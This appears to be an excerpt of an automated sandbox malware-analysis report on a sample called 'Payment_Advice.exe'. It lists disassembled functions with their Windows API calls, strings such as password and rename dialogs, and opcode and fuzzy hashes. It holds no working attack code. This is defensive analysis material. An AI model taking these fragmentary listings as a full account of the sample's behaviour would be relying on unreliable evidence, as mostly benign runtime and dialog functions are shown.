                                                                                                    • String ID:
                                                                                                    • API String ID: 1868215902-0
                                                                                                    • Opcode ID: 95b75ad9692dd6ec4a5f726f72c09bce7302c646f7a1cabaa1c95c80adbd3a0e
                                                                                                    • Instruction ID: 4c2c2425cf97e658281164c024dfc26a9515b168223fae85fac2a1ae502e6c68
                                                                                                    • Opcode Fuzzy Hash: 95b75ad9692dd6ec4a5f726f72c09bce7302c646f7a1cabaa1c95c80adbd3a0e
                                                                                                    • Instruction Fuzzy Hash: 7B01B575400B40EFD7229B64DC89FC6FBA9FB08711F000929F25B921A0CBB57A89DB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 0052C817
                                                                                                      • Part of subcall function 00528DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0052C896,?,00000000,?,00000000,?,0052C8BD,?,00000007,?,?,0052CCBA,?), ref: 00528DE2
                                                                                                      • Part of subcall function 00528DCC: GetLastError.KERNEL32(?,?,0052C896,?,00000000,?,00000000,?,0052C8BD,?,00000007,?,?,0052CCBA,?,?), ref: 00528DF4
                                                                                                    • _free.LIBCMT ref: 0052C829
                                                                                                    • _free.LIBCMT ref: 0052C83B
                                                                                                    • _free.LIBCMT ref: 0052C84D
                                                                                                    • _free.LIBCMT ref: 0052C85F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 776569668-0
                                                                                                    • Opcode ID: 5d65e918d9b412d7c543b3666a55825eea08cc8a7568fa8644fc81768ea2c260
                                                                                                    • Instruction ID: 549e0d1b38ec17c5b1f9541452ef0a12077b48896c05d329bcd7f1b21fec21cc
                                                                                                    • Opcode Fuzzy Hash: 5d65e918d9b412d7c543b3666a55825eea08cc8a7568fa8644fc81768ea2c260
                                                                                                    • Instruction Fuzzy Hash: 54F0FF33505221AB9620DBA8F88BC2B7FEDBF527147645C19F109D76E2CB70FC849A54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • _wcslen.LIBCMT ref: 00511FE5
                                                                                                    • _wcslen.LIBCMT ref: 00511FF6
                                                                                                    • _wcslen.LIBCMT ref: 00512006
                                                                                                    • _wcslen.LIBCMT ref: 00512014
                                                                                                    • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0050B371,?,?,00000000,?,?,?), ref: 0051202F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$CompareString
                                                                                                    • String ID:
                                                                                                    • API String ID: 3397213944-0
                                                                                                    • Opcode ID: 3a9f5a43f1c9cca28fb3b5910cc6613fe8e6cb611a96d33a7b0518383e7cdf39
                                                                                                    • Instruction ID: 78131267b87d1e867e2af3d5c1dd819276b91984632f580c8b3e2186c2a66932
                                                                                                    • Opcode Fuzzy Hash: 3a9f5a43f1c9cca28fb3b5910cc6613fe8e6cb611a96d33a7b0518383e7cdf39
                                                                                                    • Instruction Fuzzy Hash: 60F01D32008025BBDF266F51EC0DDCA7F2AFF85760F128415F65A5E0A1CB72DAA5D690
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _swprintf
                                                                                                    • String ID: %ls$%s: %s
                                                                                                    • API String ID: 589789837-2259941744
                                                                                                    • Opcode ID: faa0d5ddfeefbd0262373ddd44878d96f9a009b39f9b772356d8af72146c91a1
                                                                                                    • Instruction ID: 7d0cd1e8c9cbe7fc9c57be8dc9165b868dd5ba379d374f8e518e77528b7f4d7d
                                                                                                    • Opcode Fuzzy Hash: faa0d5ddfeefbd0262373ddd44878d96f9a009b39f9b772356d8af72146c91a1
                                                                                                    • Instruction Fuzzy Hash: BC51DA35248B01F6FA112A908D4BFF57E65BB05B04F288DC6F386648E1D6A3A4D1A71E
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Payment_Advice.exe,00000104), ref: 00527FAE
                                                                                                    • _free.LIBCMT ref: 00528079
                                                                                                    • _free.LIBCMT ref: 00528083
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$FileModuleName
                                                                                                    • String ID: C:\Users\user\Desktop\Payment_Advice.exe
                                                                                                    • API String ID: 2506810119-31765992
                                                                                                    • Opcode ID: bf0881ce6eeb500beaf25a51835c250967e39caff6d577404df6831e22345f8c
                                                                                                    • Instruction ID: 25f4c843ea1e187ed95a6220f44e49f10e5447aa3862bfcbfc03cd74f5f7fd46
                                                                                                    • Opcode Fuzzy Hash: bf0881ce6eeb500beaf25a51835c250967e39caff6d577404df6831e22345f8c
                                                                                                    • Instruction Fuzzy Hash: BF31B571A05629EFDB21DF99E8889AEBFBCFF96310F104066F40497290DA708E48CB51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 005231FB
                                                                                                    • _abort.LIBCMT ref: 00523306
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EncodePointer_abort
                                                                                                    • String ID: MOC$RCC
                                                                                                    • API String ID: 948111806-2084237596
                                                                                                    • Opcode ID: 131a47f9a0ff2747ebd55310db4f7785b8b63903133b2bfa024ce24b8dc541a4
                                                                                                    • Instruction ID: 9ab9d5381831e50d8345c94a43d2f0bd39e26bea5f95844c68ee81fc5c73cd98
                                                                                                    • Opcode Fuzzy Hash: 131a47f9a0ff2747ebd55310db4f7785b8b63903133b2bfa024ce24b8dc541a4
                                                                                                    • Instruction Fuzzy Hash: 0E415975900229EFCF16DF94EC81AAEBFB5BF49304F148099F904A7292D339EA50DB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 00507406
                                                                                                      • Part of subcall function 00503BBA: __EH_prolog.LIBCMT ref: 00503BBF
                                                                                                    • GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000,00000000), ref: 005074CD
                                                                                                      • Part of subcall function 00507A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00507AAB
                                                                                                      • Part of subcall function 00507A9C: GetLastError.KERNEL32 ref: 00507AF1
                                                                                                      • Part of subcall function 00507A9C: CloseHandle.KERNEL32(?), ref: 00507B00
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                                                    • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                                    • API String ID: 3813983858-639343689
                                                                                                    • Opcode ID: 6bef6ef73e1123b443f5731d5db5384f38646f2d95802ebeba9db59da60c1dff
                                                                                                    • Instruction ID: 2dac12203163fd1cc7f19e423966dbe9479e8f7fb90955ed3a42aa39651188f5
                                                                                                    • Opcode Fuzzy Hash: 6bef6ef73e1123b443f5731d5db5384f38646f2d95802ebeba9db59da60c1dff
                                                                                                    • Instruction Fuzzy Hash: E231F471E0424D6BEF10EBA4CC49BEE7FA8BF59304F004055F805A72C2D774AA88CB60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00501316: GetDlgItem.USER32(00000000,00003021), ref: 0050135A
  • Part of subcall function 00501316: SetWindowTextW.USER32(00000000,005335F4), ref: 00501370
• EndDialog.USER32(?,00000001), ref: 0051AD98
• GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0051ADAD
• SetDlgItemTextW.USER32(?,00000066,?), ref: 0051ADC2
Strings
Similarity
• API ID: ItemText$DialogWindow
• String ID: ASKNEXTVOL
• API String ID: 445417207-3402441367
• Opcode ID: aecd213fded1ac8d1dcf87237d458855522bfb5b8ec6bc968af809185221e6f7
• Instruction ID: 986836732c8b759c6d97ebd38dbf4ddcfc7187258d6577bded82778d08296e3c
• Opcode Fuzzy Hash: aecd213fded1ac8d1dcf87237d458855522bfb5b8ec6bc968af809185221e6f7
• Instruction Fuzzy Hash: 6F11B732241A01AFF7138F6CAD49FEA3F69FB5A702F040410F241D74A4C7A29D49A726
Uniqueness
Uniqueness Score: -1.00%

APIs
• IsWindowVisible.USER32(00010440), ref: 0051DDDC
• DialogBoxParamW.USER32(GETPASSWORD1,00010440,0051B270,?,?), ref: 0051DE18
Strings
Similarity
• API ID: DialogParamVisibleWindow
• String ID: GETPASSWORD1$xzU
• API String ID: 3157717868-150693504
• Opcode ID: cee7234e820048030aed0bf0d0c701eedd2e6d7b2e26ce013769174b0990a3f7
• Instruction ID: e1e41132306693be0cf925b77bde5b1c7b301d50738a5c8d0cd748978f0978bb
• Opcode Fuzzy Hash: cee7234e820048030aed0bf0d0c701eedd2e6d7b2e26ce013769174b0990a3f7
• Instruction Fuzzy Hash: 68113832604144AAEF119A34AC06BFF3FA8BB5A316F144464FD49AB081CBB4ACC8D370
Uniqueness
Uniqueness Score: -1.00%

APIs
• __fprintf_l.LIBCMT ref: 0050D954
• _strncpy.LIBCMT ref: 0050D99A
  • Part of subcall function 00511DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00541030,?,0050D928,00000000,?,00000050,00541030), ref: 00511DC4
Strings
Similarity
• API ID: ByteCharMultiWide__fprintf_l_strncpy
• String ID: $%s$@%s
• API String ID: 562999700-834177443
• Opcode ID: 221f23694edb671f4343298fb1c39c4a26774b6dd4a45f9130502e6f4a275a2b
• Instruction ID: c666c6aeb48e143927657596f857e07292520c0611ee0bdd268c8f08814b7b5f
• Opcode Fuzzy Hash: 221f23694edb671f4343298fb1c39c4a26774b6dd4a45f9130502e6f4a275a2b
• Instruction Fuzzy Hash: EA217272540249AEEB21EEE4DC46FEE7FF8BF05704F040912F911961E2E272D658CB61
Uniqueness
Uniqueness Score: -1.00%

APIs
• InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0050AC5A,00000008,?,00000000,?,0050D22D,?,00000000), ref: 00510E85
• CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0050AC5A,00000008,?,00000000,?,0050D22D,?,00000000), ref: 00510E8F
• CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0050AC5A,00000008,?,00000000,?,0050D22D,?,00000000), ref: 00510E9F
Strings
• Thread pool initialization failed., xrefs: 00510EB7
Similarity
• API ID: Create$CriticalEventInitializeSectionSemaphore
• String ID: Thread pool initialization failed.
• API String ID: 3340455307-2182114853
• Opcode ID: ff25426eab899fb6a957546ae4c0d4e8249e6d12f405ccd5a164d11367afec9a
• Instruction ID: 96d32eb135b1c44c0b86c8e5f164788e6f2f483b9db35b1b7bf8d3c516c7a450
• Opcode Fuzzy Hash: ff25426eab899fb6a957546ae4c0d4e8249e6d12f405ccd5a164d11367afec9a
• Instruction Fuzzy Hash: 5B118FB16407089BD3315F669C889ABFFECFB64744F144D2EE1DAC2240D6B199C08B60
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Similarity
• API ID: Malloc
• String ID: (Q$2Q$A
• API String ID: 2696272793-1263153503
• Opcode ID: bb9d7e518f02b43995384eabc455772a19c4897584431e02fee372149c18bf8d
• Instruction ID: 4f44d077537141e6dc6fff197e8ddaf6d9f08af1103d301d1ba310cffe14d6eb
• Opcode Fuzzy Hash: bb9d7e518f02b43995384eabc455772a19c4897584431e02fee372149c18bf8d
• Instruction Fuzzy Hash: E2011B75901219ABCF14CFA5D8489DEBBF8BF09310B10415AE905E3240D7749A44DF95
Uniqueness
Uniqueness Score: -1.00%

Strings
Similarity
• API ID:
• String ID: RENAMEDLG$REPLACEFILEDLG
• API String ID: 0-56093855
• Opcode ID: 0cf29257b9b412b9732d41ecbec7c99d16e73abc475dddaf1834233e1d4ff0cf
• Instruction ID: c132dbc85ec00d623c753ea7e1a35dfca4cd4ac7721bd4a447d160d34ece730e
• Opcode Fuzzy Hash: 0cf29257b9b412b9732d41ecbec7c99d16e73abc475dddaf1834233e1d4ff0cf
• Instruction Fuzzy Hash: 21015279504245AFEB119F54FC48AEA7FB5F729358B100425F50593231C6719C98FBB0
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0050E2E8: _swprintf.LIBCMT ref: 0050E30E
  • Part of subcall function 0050E2E8: _strlen.LIBCMT ref: 0050E32F
  • Part of subcall function 0050E2E8: SetDlgItemTextW.USER32(?,0053E274,?), ref: 0050E38F
  • Part of subcall function 0050E2E8: GetWindowRect.USER32(?,?), ref: 0050E3C9
  • Part of subcall function 0050E2E8: GetClientRect.USER32(?,?), ref: 0050E3D5
• GetDlgItem.USER32(00000000,00003021), ref: 0050135A
• SetWindowTextW.USER32(00000000,005335F4), ref: 00501370
Strings
Similarity
• API ID: ItemRectTextWindow$Client_strlen_swprintf
• String ID: Q$0
• API String ID: 2622349952-432977256
• Opcode ID: bb08f2479de05c0410285cfcc35c3530a7f14691deff827fec48bdd3aa95a901
• Instruction ID: a8a267e004c94637cddae091d2f111e6bc909b1909bc59a2fd67180912835c7d
• Opcode Fuzzy Hash: bb08f2479de05c0410285cfcc35c3530a7f14691deff827fec48bdd3aa95a901
• Instruction Fuzzy Hash: 48F08C3010478DABDF150F64C80EAEE3F98BB51344F048914FC48515E1CB74C994EA19
Uniqueness
Uniqueness Score: -1.00%

APIs
                                                                                                    Similarity
                                                                                                    • API ID: __alldvrm$_strrchr
                                                                                                    • String ID:
                                                                                                    • API String ID: 1036877536-0
                                                                                                    • Opcode ID: 3257cbe3c23a9893bcf4e13c0b157f0aff40f0c1a093e58d5470b9d1dc85e048
                                                                                                    • Instruction ID: 8896ce8a8e6fd849653f16a96bef0b568418e79a19d4290354ebc3a5dfce6400
                                                                                                    • Opcode Fuzzy Hash: 3257cbe3c23a9893bcf4e13c0b157f0aff40f0c1a093e58d5470b9d1dc85e048
                                                                                                    • Instruction Fuzzy Hash: 3EA12472A047A69FEB258F28E8917AEBFE5FF56310F18456DE485AB3C1C2388D41C750
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

APIs
• CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00507F69,?,?,?), ref: 0050A3FA
• CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00507F69,?), ref: 0050A43E
• SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00507F69,?,?,?,?,?,?,?), ref: 0050A4BF
• CloseHandle.KERNEL32(?,?,?,00000800,?,00507F69,?,?,?,?,?,?,?,?,?,?), ref: 0050A4C6
Memory Dump Source
• Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
• Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
Similarity
• API ID: File$Create$CloseHandleTime
• String ID:
• API String ID: 2287278272-0
• Opcode ID: 8a53c25a6b765b1b54e196b205bfbff567583fc795c85e500fe78aa4e5805393
• Instruction ID: db14d71b1305a87834107a2e837c170ce715e18efa3831a3898aee93d83b9dd7
• Opcode Fuzzy Hash: 8a53c25a6b765b1b54e196b205bfbff567583fc795c85e500fe78aa4e5805393
• Instruction Fuzzy Hash: DA418E312483819AE721DF24DC49FEEBFE4AB95700F040D19B5E1971D1D6A49A489B53
Uniqueness
Uniqueness Score: -1.00%

APIs
• MultiByteToWideChar.KERNEL32(?,00000000,2DE85006,005247C6,00000000,00000000,005257FB,?,005257FB,?,00000001,005247C6,2DE85006,00000001,005257FB,005257FB), ref: 0052C9D5
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0052CA5E
• GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0052CA70
• __freea.LIBCMT ref: 0052CA79
  • Part of subcall function 00528E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00524286,?,0000015D,?,?,?,?,00525762,000000FF,00000000,?,?), ref: 00528E38
Memory Dump Source
• Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
• Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
Similarity
• API ID: ByteCharMultiWide$AllocateHeapStringType__freea
• String ID:
• API String ID: 2652629310-0
• Opcode ID: cda667ab10ecd32b6adada963dc5d2fda0bc7cdd31cc2ff2e3e1f0ff7a75d713
• Instruction ID: d9833289ebe3233326218c57d7fb7570c44f8c495a532507a4f202f8fcda085c
• Opcode Fuzzy Hash: cda667ab10ecd32b6adada963dc5d2fda0bc7cdd31cc2ff2e3e1f0ff7a75d713
• Instruction Fuzzy Hash: 9B319D72A0022AABDB24DF64EC45DBE7FA6FF42710B044268FC04E6291E735DD94DB90
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetDC.USER32(00000000), ref: 0051A666
• GetDeviceCaps.GDI32(00000000,00000058), ref: 0051A675
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 0051A683
• ReleaseDC.USER32(00000000,00000000), ref: 0051A691
Memory Dump Source
• Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
• Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
Similarity
• API ID: CapsDevice$Release
• String ID:
• API String ID: 1035833867-0
• Opcode ID: 42780598523a67d365f93d84890cc3367b7baa9ba2ff38d6e737d7de54416e46
• Instruction ID: 2176abc0d0250ecd7b51f5f913312e16c2efa444d7a93d99a319d5ade3402db3
• Opcode Fuzzy Hash: 42780598523a67d365f93d84890cc3367b7baa9ba2ff38d6e737d7de54416e46
• Instruction Fuzzy Hash: 94E01231E42721FBD7615B68BC0DBDF3E54AB26B66F010205FA059B2D0DBB4860C9BA1
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
• Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
Similarity
• API ID: _wcschr
• String ID: .lnk$dQ
• API String ID: 2691759472-3104787530
• Opcode ID: 086d35efd9bda1bc94ddae3f608e8a8cf8b8b8ef80df1c8c25e83ca11a7f645c
• Instruction ID: c6b34837a6be920e7de1b9abb3bb5573261228b5dfb1bce1ce54bc54db327a27
• Opcode Fuzzy Hash: 086d35efd9bda1bc94ddae3f608e8a8cf8b8b8ef80df1c8c25e83ca11a7f645c
• Instruction Fuzzy Hash: AFA1337690022AA6EF24DBA0CD49EFA77FCBF44304F0445A6B509E7181EE759AC5CB70
Uniqueness
Uniqueness Score: -1.00%

APIs
• _free.LIBCMT ref: 0052B324
  • Part of subcall function 00529097: IsProcessorFeaturePresent.KERNEL32(00000017,00529086,00000000,00528D94,00000000,00000000,00000000,00000016,?,?,00529093,00000000,00000000,00000000,00000000,00000000), ref: 00529099
  • Part of subcall function 00529097: GetCurrentProcess.KERNEL32(C0000417,00528D94,00000000,?,00000003,00529868), ref: 005290BB
  • Part of subcall function 00529097: TerminateProcess.KERNEL32(00000000,?,00000003,00529868), ref: 005290C2
Strings
Memory Dump Source
• Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
• Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
Similarity
• API ID: Process$CurrentFeaturePresentProcessorTerminate_free
• String ID: *?$.
• API String ID: 2667617558-3972193922
• Opcode ID: 871087a43f0bd1cbd1098384f5f5eb82fa4a5fd881eee7424b44ab4bf77dde44
• Instruction ID: a02d09bcd0f45e47615551343f34fd8b59316032246e880ff0c86c4524cf36a8
• Opcode Fuzzy Hash: 871087a43f0bd1cbd1098384f5f5eb82fa4a5fd881eee7424b44ab4bf77dde44
• Instruction Fuzzy Hash: B3516F75E0022ADFEF14DFA8D881AADBBB5FF99310F244169E854A7380E7319A018B50
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 005075E3
  • Part of subcall function 005105DA: _wcslen.LIBCMT ref: 005105E0
  • Part of subcall function 0050A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0050A598
• SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0050777F
  • Part of subcall function 0050A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0050A325,?,?,?,0050A175,?,00000001,00000000,?,?), ref: 0050A501
  • Part of subcall function 0050A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0050A325,?,?,?,0050A175,?,00000001,00000000,?,?), ref: 0050A532
Strings
Memory Dump Source
• Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
• Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
